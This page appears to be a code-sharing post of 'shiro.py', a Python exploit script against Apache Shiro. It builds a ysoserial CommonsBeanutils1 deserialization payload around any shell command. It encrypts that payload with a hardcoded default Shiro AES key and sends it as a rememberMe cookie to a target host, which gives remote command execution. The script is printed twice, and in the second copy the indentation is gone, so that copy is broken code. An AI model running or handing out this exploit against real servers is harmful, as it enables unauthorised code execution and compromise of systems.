wingzRED/shiro.py Secret

## shiro.py
#!/usr/bin/env python
# usage: python3 shiro.py "touch /tmp/UWU"

import time
import base64
import uuid
import requests
import subprocess
import random
import os
import sys
import binascii
from Cryptodome.Cipher import AES

SHIRO_URL="http://192.168.91.130:8888/"
JAR_FILE='/home/wingz/tools/ysoserial/ysoserial-all.jar'
YSOSERIAL_GADGET='CommonsBeanutils1'


def poc(url, cmd):
    print("============================================================================")
    print("Sending payload [%s] to %s" % (cmd,url))
    print("============================================================================")
    try:
        payload = generator(cmd)
        print(type(payload))
        print("Generated rememberMe payload:\n %s" % repr(payload))
        r = requests.get(url, cookies={'rememberMe': payload.decode('ascii')}, timeout=10)
        #r = requests.get(url, timeout=10)

        print("============================================================================")
        print("Shiro response [%s]:\n%s" % (r.status_code, r.text))
    except Exception as e:
        print(e)
        pass


def generator(cmd):
    # call ysoserial to generate the object using cmd
    popen = subprocess.Popen(['java', '-jar', JAR_FILE, YSOSERIAL_GADGET, cmd], stdout=subprocess.PIPE)
    ysoserial_payload = popen.stdout.read()
    # print("ysoserial_payload: %s" % ysoserial_payload)

    # enrypt the payload using AES GCM mode with nonce and tag
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    nonce = b' ' * 16
    cipher = AES.new(base64.b64decode(key), AES.MODE_GCM)
    ciphertext, tag = cipher.encrypt_and_digest(ysoserial_payload)

    nonce = cipher.nonce

    # base64 it and return
    return base64.b64encode(nonce + ciphertext + tag)


if len(sys.argv) < 2:
   print("python3 {} <cmd to execute>".format(sys.argv[0]))
   sys.exit(1)

if not os.path.exists(JAR_FILE):
  print("The ysoserial jar file at %s doesn't exist!" % JAR_FILE)
  sys.exit(1)

cmd = sys.argv[1]
poc(SHIRO_URL, cmd)
	#!/usr/bin/env python
	# usage: python3 shiro.py "touch /tmp/UWU"

	import time
	import base64
	import uuid
	import requests
	import subprocess
	import random
	import os
	import sys
	import binascii
	from Cryptodome.Cipher import AES

	SHIRO_URL="http://192.168.91.130:8888/"
	JAR_FILE='/home/wingz/tools/ysoserial/ysoserial-all.jar'
	YSOSERIAL_GADGET='CommonsBeanutils1'



	def poc(url, cmd):
	print("============================================================================")
	print("Sending payload [%s] to %s" % (cmd,url))
	print("============================================================================")
	try:
	payload = generator(cmd)
	print(type(payload))
	print("Generated rememberMe payload:\n %s" % repr(payload))
	r = requests.get(url, cookies={'rememberMe': payload.decode('ascii')}, timeout=10)
	#r = requests.get(url, timeout=10)

	print("============================================================================")
	print("Shiro response [%s]:\n%s" % (r.status_code, r.text))
	except Exception as e:
	print(e)
	pass


	def generator(cmd):
	# call ysoserial to generate the object using cmd
	popen = subprocess.Popen(['java', '-jar', JAR_FILE, YSOSERIAL_GADGET, cmd], stdout=subprocess.PIPE)
	ysoserial_payload = popen.stdout.read()
	# print("ysoserial_payload: %s" % ysoserial_payload)

	# enrypt the payload using AES GCM mode with nonce and tag
	key = "kPH+bIxk5D2deZiIxcaaaA=="
	nonce = b' ' * 16
	cipher = AES.new(base64.b64decode(key), AES.MODE_GCM)
	ciphertext, tag = cipher.encrypt_and_digest(ysoserial_payload)

	nonce = cipher.nonce

	# base64 it and return
	return base64.b64encode(nonce + ciphertext + tag)


	if len(sys.argv) < 2:
	print("python3 {} <cmd to execute>".format(sys.argv[0]))
	sys.exit(1)

	if not os.path.exists(JAR_FILE):
	print("The ysoserial jar file at %s doesn't exist!" % JAR_FILE)
	sys.exit(1)

	cmd = sys.argv[1]
	poc(SHIRO_URL, cmd)